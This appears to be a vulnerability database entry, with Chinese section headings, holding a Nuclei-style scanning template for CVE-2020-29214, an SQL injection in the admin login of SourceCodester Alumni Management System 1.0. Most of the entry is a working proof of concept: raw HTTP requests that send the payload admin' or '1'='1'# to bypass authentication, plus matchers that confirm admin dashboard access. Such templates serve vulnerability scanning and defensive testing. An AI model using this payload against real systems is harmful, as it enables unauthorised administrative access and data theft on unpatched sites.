漏洞描述
SourceCodester Alumni Management System 1.0 contains a sql_injection caused by unsanitized input in admin/login.php, letting attackers bypass authentication, exploit requires injection of malicious SQL payload.
CVE-2020-29214: Alumni Management System 1.0 - SQL Injection
PoC代码[已公开]
id: CVE-2020-29214
info:
name: Alumni Management System 1.0 - SQL Injection
author: arafatansari
severity: critical
description: |
SourceCodester Alumni Management System 1.0 contains a sql_injection caused by unsanitized input in admin/login.php, letting attackers bypass authentication, exploit requires injection of malicious SQL payload.
reference:
- https://www.exploit-db.com/exploits/48883
- https://nvd.nist.gov/vuln/detail/CVE-2020-29214
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29214
cwe-id: CWE-89
epss-score: 0.47269
epss-percentile: 0.97545
cpe: cpe:2.3:a:alumni_management_system_project:alumni_management_system:1.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: alumni_management_system_project
product: alumni_management_system
tags: cve,cve2020,sqli,auth-bypass,cms,edb,alumni,vuln
http:
- raw:
- |
POST /admin/ajax.php?action=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}}
- |
GET /admin/index.php?page=home HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Welcome back Admin!'
- 'Alumni List'
condition: and
- type: word
part: body
words:
- '#login-form'
negative: true
- type: status
status:
- 200
# digest: 4b0a00483046022100e9eac3d243af5c0162d581bd893a95cd8d0f8e6e1039d2ada30a8943b6550491022100f772ac3d4cf3c1c8bfab6203b34d8a17cf1d59b1e9f0bb635877ef772c167baa:922c64590222798bb761d5b6d8e72950